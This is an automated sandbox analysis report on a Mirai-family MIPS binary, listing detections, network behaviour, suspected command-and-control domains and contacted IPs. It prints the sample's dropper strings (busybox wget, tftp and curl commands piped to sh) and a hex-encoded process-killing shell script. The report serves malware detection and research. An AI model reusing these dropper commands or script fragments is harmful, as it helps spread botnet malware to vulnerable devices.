Linux Analysis Report
hmips.elf

Overview

General Information

Sample name: hmips.elf
Analysis ID: 1579200
MD5: 40fa65794e145a61bc34ce27581f9fca
SHA1: c7d7a8f9f26394dfc4d6be2a05ba5e0d0cfaa91d
SHA256: d02adfd870363610aa7d7862c1627639f7688b7ffaa51f363dd3588cad104b2d
Tags: elfuser-abuse_ch
Infos:

Detection

Mirai
Score: 72
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Sends malformed DNS queries
Detected TCP or UDP traffic on non-standard ports
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Name Description Attribution Blogpost URLs Link
Mirai Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: hmips.elf Avira: detected
Multi AV Scanner detection for submitted file
Source: hmips.elf ReversingLabs: Detection: 39%
Found strings indicative of a multi-platform dropper
Source: hmips.elf String: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname Kamru/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0

Networking
barindex
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 86.107.100.19 ports 20665,0,2,5,6,9209
Sends malformed DNS queries
Source: global traffic DNS traffic detected: malformed DNS query: catvision.dyn. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: hikvision.geek. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: catlovingfools.geek. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: shitrocket.dyn. [malformed]
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:51294 -> 86.107.100.19:20665
Source: global traffic TCP traffic: 192.168.2.23:40680 -> 185.72.8.231:2383
Source: global traffic TCP traffic: 192.168.2.23:54152 -> 80.78.26.121:2383
Source: global traffic TCP traffic: 192.168.2.23:43438 -> 212.60.5.153:5522
Source: global traffic TCP traffic: 192.168.2.23:48188 -> 176.32.32.113:22126
Source: global traffic TCP traffic: 192.168.2.23:56450 -> 212.192.13.95:16377
Sample listens on a socket
Source: /tmp/hmips.elf (PID: 6240) Socket: 127.0.0.1:1172 Jump to behavior
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 120.224.93.115
Source: unknown TCP traffic detected without corresponding DNS query: 62.166.115.166
Source: unknown TCP traffic detected without corresponding DNS query: 62.6.168.44
Source: unknown TCP traffic detected without corresponding DNS query: 142.119.152.81
Source: unknown TCP traffic detected without corresponding DNS query: 11.42.56.192
Source: unknown TCP traffic detected without corresponding DNS query: 62.196.90.63
Source: unknown TCP traffic detected without corresponding DNS query: 119.86.34.158
Source: unknown TCP traffic detected without corresponding DNS query: 154.129.141.96
Source: unknown TCP traffic detected without corresponding DNS query: 66.82.186.198
Source: unknown TCP traffic detected without corresponding DNS query: 111.252.80.55
Source: unknown TCP traffic detected without corresponding DNS query: 34.173.174.163
Source: unknown TCP traffic detected without corresponding DNS query: 46.193.69.189
Source: unknown TCP traffic detected without corresponding DNS query: 164.136.33.219
Source: unknown TCP traffic detected without corresponding DNS query: 182.57.234.110
Source: unknown TCP traffic detected without corresponding DNS query: 31.250.118.146
Source: unknown TCP traffic detected without corresponding DNS query: 45.176.93.125
Source: unknown TCP traffic detected without corresponding DNS query: 174.130.139.50
Source: unknown TCP traffic detected without corresponding DNS query: 65.111.149.151
Source: unknown TCP traffic detected without corresponding DNS query: 15.248.79.16
Source: unknown TCP traffic detected without corresponding DNS query: 71.77.221.78
Source: unknown TCP traffic detected without corresponding DNS query: 167.114.136.244
Source: unknown TCP traffic detected without corresponding DNS query: 174.157.249.17
Source: unknown TCP traffic detected without corresponding DNS query: 217.2.170.5
Source: unknown TCP traffic detected without corresponding DNS query: 68.231.152.164
Source: unknown TCP traffic detected without corresponding DNS query: 209.49.174.176
Source: unknown TCP traffic detected without corresponding DNS query: 120.224.93.115
Source: unknown TCP traffic detected without corresponding DNS query: 176.166.134.254
Source: unknown TCP traffic detected without corresponding DNS query: 62.166.115.166
Source: unknown TCP traffic detected without corresponding DNS query: 104.1.238.242
Source: unknown TCP traffic detected without corresponding DNS query: 62.6.168.44
Source: unknown TCP traffic detected without corresponding DNS query: 27.28.57.171
Source: unknown TCP traffic detected without corresponding DNS query: 142.119.152.81
Source: unknown TCP traffic detected without corresponding DNS query: 11.42.56.192
Source: unknown TCP traffic detected without corresponding DNS query: 28.211.63.80
Source: unknown TCP traffic detected without corresponding DNS query: 145.81.142.101
Source: unknown TCP traffic detected without corresponding DNS query: 153.9.186.174
Source: unknown TCP traffic detected without corresponding DNS query: 144.68.49.216
Source: unknown TCP traffic detected without corresponding DNS query: 40.143.23.203
Source: unknown TCP traffic detected without corresponding DNS query: 208.90.131.245
Source: unknown TCP traffic detected without corresponding DNS query: 175.85.215.224
Source: unknown TCP traffic detected without corresponding DNS query: 61.184.163.149
Source: unknown TCP traffic detected without corresponding DNS query: 157.87.70.85
Source: unknown TCP traffic detected without corresponding DNS query: 54.160.157.32
Source: unknown TCP traffic detected without corresponding DNS query: 23.15.229.91
Source: unknown TCP traffic detected without corresponding DNS query: 75.178.106.170
Source: unknown TCP traffic detected without corresponding DNS query: 18.96.200.187
Source: unknown TCP traffic detected without corresponding DNS query: 167.29.60.142
Source: unknown TCP traffic detected without corresponding DNS query: 40.36.238.144
Source: unknown TCP traffic detected without corresponding DNS query: 39.107.215.89
Source: global traffic DNS traffic detected: DNS query: shitrocket.dyn
Source: global traffic DNS traffic detected: DNS query: hikvision.geek
Source: global traffic DNS traffic detected: DNS query: catlovingfools.geek
Source: global traffic DNS traffic detected: DNS query: catvision.dyn. [malformed]
Source: global traffic DNS traffic detected: DNS query: hikvision.geek. [malformed]
Source: global traffic DNS traffic detected: DNS query: catlovingfools.geek. [malformed]
Source: global traffic DNS traffic detected: DNS query: shitrocket.dyn. [malformed]
Source: hmips.elf String found in binary or memory: http:///curl.sh
Source: hmips.elf String found in binary or memory: http:///wget.sh
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: usage: busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox hostname Kamru
Source: Initial sample String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sample String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./Galaxy selfrep
Source: Initial sample String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname Kamru/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0
Source: Initial sample String containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./Galaxy selfrepI just wanna look/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mpslppcspcsh4
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal72.troj.linELF@0/0@69/0
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/hmips.elf (PID: 6240) Queries kernel information via 'uname': Jump to behavior
Source: hmips.elf, 6240.1.00007ffc9714e000.00007ffc9716f000.rw-.sdmp, hmips.elf, 6242.1.00007ffc9714e000.00007ffc9716f000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/hmips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/hmips.elf
Source: hmips.elf, 6242.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmp Binary or memory string: ^U!/usr/bin/vmtoolsd
Source: hmips.elf, 6240.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmp, hmips.elf, 6242.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmp Binary or memory string: ^U!/etc/qemu-binfmt/mips
Source: hmips.elf, 6240.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmp, hmips.elf, 6242.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mips
Source: hmips.elf, 6242.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmp Binary or memory string: /usr/bin/vmtoolsd
Source: hmips.elf, 6240.1.00007ffc9714e000.00007ffc9716f000.rw-.sdmp, hmips.elf, 6242.1.00007ffc9714e000.00007ffc9716f000.rw-.sdmp Binary or memory string: /usr/bin/qemu-mips

Stealing of Sensitive Information
barindex
Yara detected Mirai
Source: Yara match File source: hmips.elf, type: SAMPLE
Source: Yara match File source: 6242.1.00007fd79c400000.00007fd79c415000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6240.1.00007fd79c400000.00007fd79c415000.r-x.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected Mirai
Source: Yara match File source: hmips.elf, type: SAMPLE
Source: Yara match File source: 6242.1.00007fd79c400000.00007fd79c415000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6240.1.00007fd79c400000.00007fd79c415000.r-x.sdmp, type: MEMORY
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
61.248.201.68
 unknown Korea Republic of
3786 LGDACOMLGDACOMCorporationKR false
158.111.69.119
 unknown United States
13611 CDCUS false
92.243.22.79
 unknown France
203476 GANDI-AS-2Domainnameregistrar-httpwwwgandinetFR false
59.101.152.237
 unknown Australia
2764 AAPTAAPTLimitedAU false
147.175.228.70
 unknown Slovakia (SLOVAK Republic)
2607 SANETSlovakAcademicNetworkSK false
55.84.215.193
 unknown United States
351 DNIC-ASBLK-00306-00371US false
185.230.47.158
 unknown Ukraine
205692 WEBINVESTPLUSUA false
28.13.247.181
 unknown United States
7922 COMCAST-7922US false
84.194.149.212
 unknown Belgium
6848 TELENET-ASBE false
101.102.207.29
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
78.91.104.110
 unknown Norway
224 UNINETTUNINETTTheNorwegianUniversityResearchNetwork false
54.185.230.168
 unknown United States
16509 AMAZON-02US false
188.138.99.78
 unknown Germany
8972 GD-EMEA-DC-SXB1DE false
217.238.216.22
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
4.39.172.234
 unknown United States
46164 ATT-MOBILITY-LABSUS false
77.181.19.192
 unknown Germany
6805 TDDE-ASN1DE false
191.123.132.141
 unknown Brazil
26615 TIMSABR false
129.93.247.90
 unknown United States
7896 NU-ASUS false
199.33.240.31
 unknown United States
7782 ALSK-7782US false
205.51.55.180
 unknown United States
2914 NTT-COMMUNICATIONS-2914US false
157.151.4.253
 unknown United States
23342 UNITEDLAYERUS false
196.170.87.186
 unknown Togo
24691 TOGOTEL-ASTogoTelecomTogoTG false
206.209.124.186
 unknown United States
23548 THEDACAREUS false
211.17.244.132
 unknown Japan 4713 OCNNTTCommunicationsCorporationJP false
132.66.186.162
 unknown Israel
378 MACHBA-ASILANIL false
166.87.167.210
 unknown Saudi Arabia
5080 ARAMCO-ASUS false
75.128.235.161
 unknown United States
20115 CHARTER-20115US false
145.224.25.238
 unknown United Kingdom
1101 IP-EEND-ASIP-EENDBVNL false
30.236.150.145
 unknown United States
7922 COMCAST-7922US false
121.237.234.92
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
22.238.114.140
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
63.41.135.162
 unknown United States
22394 CELLCOUS false
203.241.214.22
 unknown Korea Republic of
18401 AS18401-AS-KRDAEGUUNIVERSITYKR false
220.20.108.56
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
109.142.223.115
 unknown Belgium
5432 PROXIMUS-ISP-ASBE false
211.160.25.151
 unknown China
9814 FIBRLINKBeijingFibrLINKNetworksCoLtdCN false
60.105.182.252
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
183.19.27.115
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
209.248.243.232
 unknown United States
7029 WINDSTREAMUS false
90.221.106.17
 unknown United Kingdom
5607 BSKYB-BROADBAND-ASGB false
223.98.57.231
 unknown China
24444 CMNET-V4SHANDONG-AS-APShandongMobileCommunicationCompany false
66.9.20.10
 unknown United States
18885 M2NGAGE2US false
170.101.226.66
 unknown Saudi Arabia
25019 SAUDINETSTC-ASSA false
175.23.41.204
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
131.110.72.47
 unknown United States
6 BULL-HNUS false
143.225.102.51
 unknown Italy
137 ASGARRConsortiumGARREU false
156.60.232.255
 unknown United States
1226 CTA-42-AS1226US false
206.64.5.124
 unknown United States
701 UUNETUS false
64.79.82.146
 unknown United States
10297 ENET-2US false
146.211.79.112
 unknown Finland
16086 DNAFI false
24.66.153.15
 unknown Canada
6327 SHAWCA false
58.12.166.205
 unknown Japan 17506 UCOMARTERIANetworksCorporationJP false
54.54.164.172
 unknown United States
14618 AMAZON-AESUS false
49.30.181.29
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
167.12.63.91
 unknown United States
3816 COLOMBIATELECOMUNICACIONESSAESPCO false
137.27.163.26
 unknown United States
20115 CHARTER-20115US false
146.20.121.237
 unknown United States
27357 RACKSPACEUS false
38.207.37.102
 unknown United States
9009 M247GB false
74.100.71.79
 unknown United States
701 UUNETUS false
73.105.156.45
 unknown United States
7922 COMCAST-7922US false
36.50.14.16
 unknown unknown
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
37.206.42.120
 unknown Italy
3269 ASN-IBSNAZIT false
115.244.44.165
 unknown India
55836 RELIANCEJIO-INRelianceJioInfocommLimitedIN false
156.214.15.151
 unknown Egypt
8452 TE-ASTE-ASEG false
175.108.110.197
 unknown Japan 2516 KDDIKDDICORPORATIONJP false
101.219.236.184
 unknown India
58519 CHINATELECOM-CTCLOUDCloudComputingCorporationCN false
78.170.19.203
 unknown Turkey
9121 TTNETTR false
108.78.15.60
 unknown United States
7018 ATT-INTERNET4US false
209.92.151.127
 unknown United States
7029 WINDSTREAMUS false
161.177.38.22
 unknown United States
10695 WAL-MARTUS false
6.117.134.75
 unknown United States
3356 LEVEL3US false
78.61.93.100
 unknown Lithuania
8764 TELIA-LIETUVALT false
146.225.111.145
 unknown United States
25400 TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO false
30.210.187.13
 unknown United States
7922 COMCAST-7922US false
153.203.223.211
 unknown Japan 4713 OCNNTTCommunicationsCorporationJP false
150.179.157.247
 unknown United States
3479 PEACHNET-AS1US false
99.218.40.105
 unknown Canada
812 ROGERS-COMMUNICATIONSCA false
40.99.98.3
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
201.3.136.151
 unknown Brazil
8167 BrasilTelecomSA-FilialDistritoFederalBR false
58.65.191.39
 unknown Pakistan
23674 NAYATEL-PKNayatelPvtLtdPK false
61.26.182.226
 unknown Japan 9824 JTCL-JP-ASJupiterTelecommunicationCoLtdJP false
201.143.209.15
 unknown Mexico
8151 UninetSAdeCVMX false
124.65.32.115
 unknown China
4808 CHINA169-BJChinaUnicomBeijingProvinceNetworkCN false
142.17.208.176
 unknown Canada
611 NECN-1-611CA false
213.85.209.25
 unknown Russian Federation
8615 CNT-ASMoscowRussiaRU false
166.180.68.254
 unknown United States
22394 CELLCOUS false
37.248.66.142
 unknown Poland
8374 PLUSNETPlusnetworkoperatorinPolandPL false
94.244.131.127
 unknown Ukraine
34743 NASHNET-ASKievUkraineUA false
5.36.68.138
 unknown Oman
28885 OMANTEL-NAP-ASOmanTelNAPOM false
136.48.74.228
 unknown United States
16591 GOOGLE-FIBERUS false
204.16.157.87
 unknown United States
30686 LVLT-30686US false
86.55.160.189
 unknown Iran (ISLAMIC Republic Of)
197207 MCCI-ASIR false
183.9.56.218
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
121.231.38.194
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
132.193.131.201
 unknown United States
668 DNIC-AS-00668US false
31.59.195.66
 unknown Iran (ISLAMIC Republic Of)
31549 RASANAIR false
26.227.137.255
 unknown United States
7922 COMCAST-7922US false
135.33.140.90
 unknown United States
54614 CIKTELECOM-CABLECA false
135.174.27.80
 unknown United States
14962 NCR-252US false
142.176.248.215
 unknown Canada
855 CANET-ASN-4CA false

Contacted Domains

Name IP Active
shitrocket.dyn 212.60.5.153 true
catlovingfools.geek 185.72.8.231 true
hikvision.geek 185.72.8.231 true
catlovingfools.geek. [malformed] unknown unknown
hikvision.geek. [malformed] unknown unknown
shitrocket.dyn. [malformed] unknown unknown
catvision.dyn. [malformed] unknown unknown